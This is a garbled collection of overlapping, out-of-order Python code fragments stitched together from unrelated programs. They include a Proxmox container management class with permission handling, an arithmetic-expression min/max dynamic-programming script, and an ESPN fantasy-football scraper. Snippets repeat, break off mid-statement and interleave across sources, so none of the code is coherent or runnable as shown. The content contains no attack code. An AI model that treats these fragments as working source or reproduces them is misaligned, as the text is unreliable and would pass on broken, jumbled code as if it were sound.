permissions for this container for all users with any role", "Dict[str, ProxmoxContainer] = {} def keys(self): self._get_containers() return self._containers.keys() def values(self): self._get_containers() return", "def __getitem__(self, key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key]", "propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove all permissions for this container for", "if isinstance(user, ProxmoxUser): user = 
user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"0\", propagate=\"0\")", "ID or ProxmoxNode object (optional) :param name: Name of new LXC (optional) :param", "timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self) -> str:", "999999999\") if newid < 100 or newid > 999_999_999: raise ValueError(\"ID of container", "reboot(self, timeout: int = None) -> str: \"\"\" Reboot container (safely) :param timeout:", "container :param newid: ID of new LXC (integer number 100-999999999) :param newnode: New", "self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers:", "'1' if full else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode):", "full else '0'} if newnode is not None: if isinstance(newnode, ProxmoxNode): newnode =", "\"\"\" path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"])", "key: Union[str, int]) -> ProxmoxContainer: key = str(key) self._get_containers() return self._containers[key] def __iter__(self):", "str) -> None: \"\"\" Remove permission for this container :param user: User ID", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) ->", "this container and their roles :return: List of tuples of ProxmoxUser objects and", "not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str: \"\"\" Delete", "__init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def keys(self):", "newid = int(newid) except ValueError: raise ValueError(\"ID of container should be an integer", "class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] =", "= {\"node\": 
self._node, \"vmid\": self._vmid, \"forceStop\": '1' if force_stop else '0'} if timeout", "Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api: APIWrapper, vmid: str,", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"]", "return f\"<{self.__class__.__name__}: {self._vmid}>\" def __str__(self): return self._vmid def __eq__(self, other: 'ProxmoxContainer'): return self._vmid", "-> str: \"\"\" :return: Unique ID of container (get-only) \"\"\" return self._vmid @property", "task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) ->", "self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None: \"\"\" Remove", "\"\"\" Get detailed config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node,", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str:", "this container :return: Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self,", "Start container :return: ID of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid}", "new permission for this container :param user: User ID or ProxmoxUser object :param", "suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox GUI and", "def __init__(self, api: APIWrapper): self._api = api self._containers: Dict[str, ProxmoxContainer] = {} def", "None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) ->", "-> bool: \"\"\" Whether this container is a template 
:return: True/False \"\"\" config", "[ProxmoxContainer(self._api, str(cont[\"vmid\"]), node) for cont in resp] self._containers = {cont.id: cont for cont", "str: \"\"\" Resume container WARNING: doesn't appear in Proxmox GUI and probably never", "be an integer between 100 and 999999999\") newid = str(newid) kwargs = {\"newid\":", "newid: ID of new LXC (integer number 100-999999999) :param newnode: New node ID", "remove(self, vmid: Union[str, int]) -> None: \"\"\" Remove container by ID :param vmid:", "self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop: bool = True) -> str:", "Container info in JSON-like format \"\"\" return self._api.get_container_status(node=self._node, vmid=self._vmid) def get_config(self) -> Dict[str,", "self._vmid} return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID", "self._vmid} if timeout is not None: kwargs[\"timeout\"] = str(timeout) return self._api.reboot_container(**kwargs) def suspend(self)", "[(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in resp if el[\"path\"] and el[\"type\"] == \"user\"", ".users import ProxmoxUser from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer:", "\"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): return f\"<{self.__class__.__name__}: {self._vmid}>\"", "linked might not be supported) (optional, default=True) :return: ID of cloning task \"\"\"", "[] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]), node)", "str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int = None) -> str: \"\"\" Reboot", "tuples of ProxmoxUser objects and string names of roles \"\"\" path = \"/vms/\"", "\"/vms/\" + self._vmid resp = self._api.get_access_control_list() return 
[(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for el in", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int =", "not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name", "node @property def id(self) -> str: \"\"\" :return: Unique ID of container (get-only)", "def __eq__(self, other: 'ProxmoxContainer'): return self._vmid == other._vmid and self._node == other._node class", "ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode if name is not None: kwargs[\"hostname\"]", "self._api.reboot_container(**kwargs) def suspend(self) -> str: \"\"\" Suspend container WARNING: doesn't appear in Proxmox", "Container ID :return: None \"\"\" vmid = str(vmid) self._get_containers() self._containers[vmid].delete() def __len__(self): self._get_containers()", ":return: Node on which containers is located (get-only) \"\"\" return ProxmoxNode(self._api, self._node) def", "detailed config :return: Container config in JSON-like format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def", "\"full\": '1' if full else '0'} if newnode is not None: if isinstance(newnode,", "Remove all permissions for this container for all users with any role :return:", "True/False \"\"\" config = self.get_status_report() return \"status\" in config.keys() and config[\"status\"] == \"running\"", "= \"/vms/\" + self._vmid if isinstance(user, ProxmoxUser): user = user.id self._api.update_access_control_list(path=path, roles=role, users=user", "def start(self) -> str: \"\"\" Start container :return: ID of task \"\"\" kwargs", "format \"\"\" return self._api.get_container_config(node=self._node, vmid=self._vmid) def running(self) -> bool: \"\"\" Whether container is", "name is not None: kwargs[\"hostname\"] = name return self._api.clone_container(**kwargs) def delete(self) -> str:", "def resume(self) -> str: \"\"\" 
Resume container WARNING: doesn't appear in Proxmox GUI", "ProxmoxNode, ProxmoxNodeDict from .users import ProxmoxUser from typing import Dict, List, Tuple, Any,", "kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not None: kwargs[\"timeout\"] =", "a template :return: True/False \"\"\" config = self.get_config() return \"template\" in config.keys() and", "\"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} return self._api.resume_container(**kwargs) def view_permissions(self) -> List[Tuple[ProxmoxUser,", "'1' if force_stop else '0'} if timeout is not None: kwargs[\"timeout\"] = str(timeout)", "for all users with any role :return: None \"\"\" for user, permission in", "node(self) -> ProxmoxNode: \"\"\" :return: Node on which containers is located (get-only) \"\"\"", "permissions for this container and their roles :return: List of tuples of ProxmoxUser", "return self._containers.keys() def values(self): self._get_containers() return self._containers.values() def items(self): self._get_containers() return self._containers.items() def", "other._vmid and self._node == other._node class ProxmoxContainerDict: def __init__(self, api: APIWrapper): self._api =", "bool: \"\"\" Whether this container is a template :return: True/False \"\"\" config =", "100-999999999) :param newnode: New node ID or ProxmoxNode object (optional) :param name: Name", "of the role :return: None \"\"\" path = \"/vms/\" + self._vmid if isinstance(user,", "default=True) :return: ID of cloning task \"\"\" try: newid = int(newid) except ValueError:", "and el[\"type\"] == \"user\" and el[\"ugid\"].split(\"@\")[1] == \"pve\" and el[\"path\"] == path] def", "return self._api.start_container(**kwargs) def stop(self) -> str: \"\"\" Stop container (unsafely) :return: ID of", "name of the role :return: None \"\"\" path = \"/vms/\" + self._vmid if", ":return: None \"\"\" for user, permission in self.view_permissions(): self.remove_permission(user, permission) def __repr__(self): 
return", "from typing import Dict, List, Tuple, Any, Union class ProxmoxContainer: def __init__(self, api:", "of task \"\"\" kwargs = {\"node\": self._node, \"vmid\": self._vmid} if timeout is not", "{\"node\": self._node, \"vmid\": self._vmid} return self._api.stop_container(**kwargs) def shutdown(self, timeout: int = None, force_stop:", "newnode is not None: if isinstance(newnode, ProxmoxNode): newnode = newnode.id kwargs[\"target\"] = newnode", "= user.id self._api.update_access_control_list(path=path, roles=role, users=user + \"@pve\", delete=\"1\", propagate=\"0\") def remove_all_permissions(self) -> None:", "and their roles :return: List of tuples of ProxmoxUser objects and string names", "node ID or ProxmoxNode object (optional) :param name: Name of new LXC (optional)", "= [] for node in ProxmoxNodeDict(self._api).keys(): resp = self._api.list_containers(node) containers += [ProxmoxContainer(self._api, str(cont[\"vmid\"]),", "\"\"\" Reboot container (safely) :param timeout: Number of seconds to wait (optional) :return:", "is not None: kwargs[\"timeout\"] = str(timeout) return self._api.shutdown_container(**kwargs) def reboot(self, timeout: int =", "appear in Proxmox GUI and probably never works :return: ID of task \"\"\"", "path = \"/vms/\" + self._vmid resp = self._api.get_access_control_list() return [(ProxmoxUser(self._api, el[\"ugid\"].split(\"@\")[0]), el[\"roleid\"]) for", ":param user: User ID or ProxmoxUser object :param role: String name of the", "(safely) :param timeout: Number of seconds to wait (optional) :return: ID of task", "vmid=self._vmid) def get_config(self) -> Dict[str, Any]: \"\"\" Get detailed config :return: Container config" ]
[ "a, b, c, d) MAX = max(MAX, a, b, c, d) return (MIN,", "* b else: assert False def MinAndMax(i, j): MIN = float('inf') MAX =", "op == '-': return a - b elif op == '*': return a", "MAX = float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k +", "op = [dataset[i] for i in range(1, len(dataset), 2)] m, M, n =", "return a + b elif op == '-': return a - b elif", "op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d", "+ 1][j], op[k - 1]) MIN = min(MIN, a, b, c, d) MAX", "in range(1, len(dataset), 2)] m, M, n = [], [], len(digits) for i", "j in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n +", "b, op): if op == '+': return a + b elif op ==", "a * b else: assert False def MinAndMax(i, j): MIN = float('inf') MAX", "c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k", "'+': return a + b elif op == '-': return a - b", "for j in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n", "range(1, n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1]", "len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset), 2)] m, M,", "i in range(0, len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset),", "= max(MAX, a, b, c, d) return (MIN, MAX) dataset = list(input()) digits", "float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k", "len(digits) for i in range(n + 1): m.append([]) M.append([]) for j in range(n", "- 1], digits[i - 1] for s in range(1, n): for i in", "j): a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k],", "evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN, a, b, c,", "1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1])", "[], [], len(digits) for i in range(n + 1): m.append([]) M.append([]) for j", "MAX = max(MAX, a, b, c, d) return (MIN, MAX) dataset = list(input())", "= [int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i] for i", "b else: assert False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf')", "= i + s m[i][j], M[i][j] = 
MinAndMax(i, j) # print(m) # print(M)", "range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i],", "for i in range(1, n + 1): m[i][i], M[i][i] = digits[i - 1],", "MIN = min(MIN, a, b, c, d) MAX = max(MAX, a, b, c,", "n = [], [], len(digits) for i in range(n + 1): m.append([]) M.append([])", "(MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset),", "in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b", "m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for i in", "d) MAX = max(MAX, a, b, c, d) return (MIN, MAX) dataset =", "b, c, d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for", "i in range(1, len(dataset), 2)] m, M, n = [], [], len(digits) for", "assert False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k", "digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i] for", "2)] m, M, n = [], [], len(digits) for i in range(n +", "s): j = i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m)", "n + 1 - s): j = i + s m[i][j], M[i][j] =", "in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1, n + 1):", "= digits[i - 1], digits[i - 1] for s in range(1, n): for", "1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for i", "for s in range(1, n): for i in range(1, n + 1 -", "for i in range(1, n + 1 - s): j = i +", "== '+': return a + b elif op == '-': return a -", "j = i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m) #", "MAX) dataset = list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)]", "- b elif op == '*': return a * b else: assert False", "elif op == '-': return a - b elif op == '*': return", "d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i in", "== '*': return a * b else: assert False def MinAndMax(i, j): MIN", "1]) MIN = min(MIN, a, b, c, d) MAX = max(MAX, a, b,", "c, d) return (MIN, MAX) dataset = 
list(input()) digits = [int(dataset[i]) for i", "MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k in range(i, j):", "evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j],", "+ 1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for s", "- 1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN =", "= evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN, a, b,", "digits[i - 1] for s in range(1, n): for i in range(1, n", "in range(1, n + 1 - s): j = i + s m[i][j],", "n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for", "return a - b elif op == '*': return a * b else:", "for i in range(0, len(dataset), 2)] op = [dataset[i] for i in range(1,", "range(n + 1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0)", "Uses python3 def evalt(a, b, op): if op == '+': return a +", "n): for i in range(1, n + 1 - s): j = i", "MIN = float('inf') MAX = float('-inf') for k in range(i, j): a =", "a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k", "m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for s in range(1,", "b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k", "- s): j = i + s m[i][j], M[i][j] = MinAndMax(i, j) #", "evalt(a, b, op): if op == '+': return a + b elif op", "op == '*': return a * b else: assert False def MinAndMax(i, j):", "+ 1 - s): j = i + s m[i][j], M[i][j] = MinAndMax(i,", "a, b, c, d) return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i])", "2)] op = [dataset[i] for i in range(1, len(dataset), 2)] m, M, n", "M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k", "op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN", "range(0, len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset), 2)] m,", "i in range(n + 1): m.append([]) M.append([]) for j in range(n + 1):", "M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i] = digits[i -", "range(1, len(dataset), 2)] m, M, n = [], [], len(digits) for i in", "digits[i - 1], digits[i - 1] 
for s in range(1, n): for i", "+ b elif op == '-': return a - b elif op ==", "for i in range(1, len(dataset), 2)] m, M, n = [], [], len(digits)", "1 - s): j = i + s m[i][j], M[i][j] = MinAndMax(i, j)", "= evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k +", "i in range(1, n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i", "range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k - 1]) b =", "M[i][i] = digits[i - 1], digits[i - 1] for s in range(1, n):", "[dataset[i] for i in range(1, len(dataset), 2)] m, M, n = [], [],", "- 1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c =", "m, M, n = [], [], len(digits) for i in range(n + 1):", "b, c, d) MAX = max(MAX, a, b, c, d) return (MIN, MAX)", "float('inf') MAX = float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k", "- 1]) MIN = min(MIN, a, b, c, d) MAX = max(MAX, a,", "i + s m[i][j], M[i][j] = MinAndMax(i, j) # print(m) # print(M) print(M[1][n])", "list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i]", "+ 1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k -", "in range(0, len(dataset), 2)] op = [dataset[i] for i in range(1, len(dataset), 2)]", "min(MIN, a, b, c, d) MAX = max(MAX, a, b, c, d) return", "m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i] = digits[i", "= evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k +", "1): m[i][i], M[i][i] = digits[i - 1], digits[i - 1] for s in", "elif op == '*': return a * b else: assert False def MinAndMax(i,", "j): MIN = float('inf') MAX = float('-inf') for k in range(i, j): a", "1][j], op[k - 1]) MIN = min(MIN, a, b, c, d) MAX =", "for i in range(n + 1): m.append([]) M.append([]) for j in range(n +", "dataset = list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op", "= [dataset[i] for i in range(1, len(dataset), 2)] m, M, n = [],", "b elif op == '*': return a * b else: assert False def", "b elif op == '-': return a - b elif op == '*':", "op[k - 1]) b = 
evalt(M[i][k], m[k + 1][j], op[k - 1]) c", "evalt(M[i][k], M[k + 1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j],", "== '-': return a - b elif op == '*': return a *", "= float('inf') MAX = float('-inf') for k in range(i, j): a = evalt(M[i][k],", "False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k in", "1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k],", "m[k + 1][j], op[k - 1]) MIN = min(MIN, a, b, c, d)", "else: assert False def MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for", "[int(dataset[i]) for i in range(0, len(dataset), 2)] op = [dataset[i] for i in", "+ 1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for", "1]) d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN,", "'*': return a * b else: assert False def MinAndMax(i, j): MIN =", "M, n = [], [], len(digits) for i in range(n + 1): m.append([])", "a - b elif op == '*': return a * b else: assert", "op[k - 1]) MIN = min(MIN, a, b, c, d) MAX = max(MAX,", "M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k", "i in range(1, n + 1 - s): j = i + s", "1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1])", "in range(n + 1): m.append([]) M.append([]) for j in range(n + 1): m[i].append(0)", "op == '+': return a + b elif op == '-': return a", "1] for s in range(1, n): for i in range(1, n + 1", "+ 1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j], op[k -", "[], len(digits) for i in range(n + 1): m.append([]) M.append([]) for j in", "in range(1, n + 1): m[i][i], M[i][i] = digits[i - 1], digits[i -", "s in range(1, n): for i in range(1, n + 1 - s):", "1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1]) c = evalt(m[i][k],", "range(1, n + 1 - s): j = i + s m[i][j], M[i][j]", "+ 1): m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i]", "return (MIN, MAX) dataset = list(input()) digits = [int(dataset[i]) for i in range(0,", "evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k + 1][j],", "def 
MinAndMax(i, j): MIN = float('inf') MAX = float('-inf') for k in range(i,", "k in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k - 1])", "d = evalt(m[i][k], m[k + 1][j], op[k - 1]) MIN = min(MIN, a,", "op): if op == '+': return a + b elif op == '-':", "range(1, n): for i in range(1, n + 1 - s): j =", "- 1]) c = evalt(m[i][k], M[k + 1][j], op[k - 1]) d =", "= min(MIN, a, b, c, d) MAX = max(MAX, a, b, c, d)", "python3 def evalt(a, b, op): if op == '+': return a + b", "+ 1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k -", "return a * b else: assert False def MinAndMax(i, j): MIN = float('inf')", "def evalt(a, b, op): if op == '+': return a + b elif", "len(dataset), 2)] m, M, n = [], [], len(digits) for i in range(n", "max(MAX, a, b, c, d) return (MIN, MAX) dataset = list(input()) digits =", "a + b elif op == '-': return a - b elif op", "= list(input()) digits = [int(dataset[i]) for i in range(0, len(dataset), 2)] op =", "- 1] for s in range(1, n): for i in range(1, n +", "if op == '+': return a + b elif op == '-': return", "= [], [], len(digits) for i in range(n + 1): m.append([]) M.append([]) for", "M.append([]) for j in range(n + 1): m[i].append(0) M[i].append(0) for i in range(1,", "m[k + 1][j], op[k - 1]) c = evalt(m[i][k], M[k + 1][j], op[k", "c, d) MAX = max(MAX, a, b, c, d) return (MIN, MAX) dataset", "= float('-inf') for k in range(i, j): a = evalt(M[i][k], M[k + 1][j],", "in range(1, n): for i in range(1, n + 1 - s): j", "# Uses python3 def evalt(a, b, op): if op == '+': return a", "1], digits[i - 1] for s in range(1, n): for i in range(1,", "for k in range(i, j): a = evalt(M[i][k], M[k + 1][j], op[k -", "1][j], op[k - 1]) b = evalt(M[i][k], m[k + 1][j], op[k - 1])", "= evalt(m[i][k], M[k + 1][j], op[k - 1]) d = evalt(m[i][k], m[k +", "'-': return a - b elif op == '*': return a * b", "1): m[i].append(0) M[i].append(0) for i in range(1, n + 1): m[i][i], M[i][i] =" ]
[ "str 'DEN', 'BUF', etc. Returns: HTML string \"\"\" url = f\"http://www.espn.com/nfl/team/roster/_/name/{team_code}\" return self.get(url,", "Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] = child.attrs.get(\"playerid\") results.append(player) return results @staticmethod def weekly_scoring_k(content):", "= dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")}) for", "(str): 'qb', 'wr', etc. Returns: str: HTML TODO: rework for new URL \"\"\"", "str \"\"\" url = \"http://www.espn.com/nfl/players?position={}&league=nfl\" return self.get(url.format(pos), encoding=\"latin1\") def projections(self, pos, season_year=None, week=0,", "player[\"source_player_position\"] = tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass", "max_offset.get(pos): raise ValueError(\"invalid offset {}\".format(offset)) if offset % 40 > 0: raise ValueError(\"invalid", "6, \"dst\": 16, \"k\": 17} max_offset = {\"qb\": 120, \"rb\": 240, \"wr\": 360,", "rework for new URL \"\"\" poscode = {\"qb\": 0, \"rb\": 2, \"wr\": 4,", "return players @staticmethod def players_position(content, pos): \"\"\" Parses page of ESPN players by", "other names/ids \"\"\" def __init__(self, source_name=\"espn\"): \"\"\" Args: source_name(str): either 'espn' or 'espn_fantasy'", "mostly about managing fantasy teams # NOTE: trouble accessing data in offseason #", "page Args: content (str): HTML Returns: list: of dict \"\"\" results = []", "def _val(val): \"\"\" Converts non-numeric value to numeric 0 Args: val: Returns: number", "{ \"scoringPeriodId\": week, \"seasonId\": season_year, \"slotCategoryId\": position, } return self.get(url, params=params) class Parser:", "\"te\", \"flex\"]: headers = [ \"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\",", "= 
link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players @staticmethod def", "0, \"rb\": 2, \"wr\": 4, \"te\": 6, \"dst\": 16, \"k\": 17} max_offset =", "have attempts/completions in one column so have to remove & split vals =", "basic fantasy data # espn_fantasy is mostly about managing fantasy teams # NOTE:", "= Scraper(cache_name=cache_name) if parser: self._p = parser else: self._p = Parser() def adp(self,", "Args: content (str): HTML Returns: list: of dict \"\"\" # TODO: adapt for", "'espn' or 'espn_fantasy' \"\"\" super().__init__() self.source_name = source_name if __name__ == \"__main__\": pass", "\"pass_att\", \"pass_cmp\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\", \"rush_yds\", \"rush_td\", \"rec\", \"rec_yds\", \"rec_td\", \"fantasy_points_ppr\", ]", "dict \"\"\" results = [] headers = [ \"c_a\", \"pass_yds\", \"pass_td\", \"pass_int\", \"rush_att\",", "adp(self, season_year): \"\"\" Gets season ADP data Args: season_year(int): 2018, 2019, etc. Returns:", "player = dict(zip(headers, tds)) # name, team, position nametd = row.find(\"td\", {\"id\": re.compile(r\"playername\")})", "24: \"LAC\", 25: \"SF\", 26: \"Sea\", 27: \"TB\", 28: \"Wsh\", 29: \"Car\", 30:", "Gets weekly fantasy scoring page Args: season_year (int): 2017, 2016, etc. 
week (int):", "player[ \"source_player_position\" ] = child.string.split()[1:3] elif isinstance(child, Tag): player[\"source_player_name\"] = child.string player[\"source_player_id\"] =", "players = [] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches =", "3: \"Chi\", 4: \"Cin\", 5: \"Cle\", 6: \"Dal\", 7: \"Den\", 8: \"Det\", 9:", "results @staticmethod def weekly_scoring_dst(content): \"\"\" Parses weekly scoring page for dst Args: content(str):", "\"rec_rec\", \"rec_yds\", \"rec_td\", \"rec_tar\", \"tpc\", \"fumble\", \"misc_td\", \"fpts\", ] soup = BeautifulSoup(content, \"lxml\")", "adp(self, season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns: dict: parsed", "by position Args: pos(str): qb, rb, wr, te, k, etc. Returns: str \"\"\"", "of dict \"\"\" players = [] soup = BeautifulSoup(content, \"lxml\") for row in", "2019, etc. Returns: list: of dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class", "season_year): \"\"\" Gets adp data Args: season_year(int): 2019, etc. Returns: dict: parsed JSON", "in tl_wanted} for scoring_type in [\"PPR\", \"STANDARD\"]: for rank_type in [\"rank\", \"auctionValue\"]: key", "[ \"qb\", \"rb\", \"wr\", \"te\", \"dst\", \"d/st\", \"k\", \"QB\", \"RB\", \"WR\", \"TE\", \"K\",", "Gets adp data Args: season_year(int): 2019, etc. 
Returns: dict: parsed JSON \"\"\" url", "string TODO: revise based on new URL \"\"\" pos = pos.lower() slot_categories =", "dict \"\"\" content = self._s.adp(season_year) return self._p.adp(content) class Xref(Site): \"\"\" Cross-reference source players", "[] soup = BeautifulSoup(content, \"lxml\") for row in soup.find_all(\"tr\"): class_matches = set([\"oddrow\", \"evenrow\"])", "tds[2].text player[\"source_player_name\"] = link.text player[\"source_player_id\"] = link[\"href\"].split(\"/\")[-2] players.append(player) except ValueError: pass return players", "slot_categories[pos], \"startIndex\": offset, \"seasonId\": season_year, } else: params = {\"slotCategoryId\": slot_categories[pos], \"startIndex\": offset}", "by position Args: pos: str qb, rb, wr, te, k, etc. season_year: int", "content: Returns: list of dict \"\"\" vals = [] for item in content[\"players\"]:", "espn football data # this does include some basic fantasy data # espn_fantasy", "rank_type try: api_player[key] = item[\"player\"][\"draftRanksByRankType\"][ scoring_type ][rank_type] except KeyError: api_player[key] = None vals.append(api_player)", "{\"id\": re.compile(r\"plyr\")}): tds = [td.text for td in row.find_all(\"td\", class_=\"playertableStat\")] if tds: player", "Returns: list: of dict \"\"\" # TODO: adapt for kicker results = []", "valid and uppercase Args: pos(str): Returns: str \"\"\" if pos in [ \"qb\",", "in soup.find_all(\"tr\"): link = row.find(\"a\", {\"href\": re.compile(r\"/nfl/player/_/id/\")}) try: player = {\"source\": \"espn\"} tds", "scoring page for kickers Args: content (str): HTML Returns: list: of dict \"\"\"", "name/team/pos link, navstr = list(tds[1].children)[0:2] player[\"source_player_name\"] = link.text player[\"source_player_team\"], player[ \"source_player_position\" ] =", "etc. 
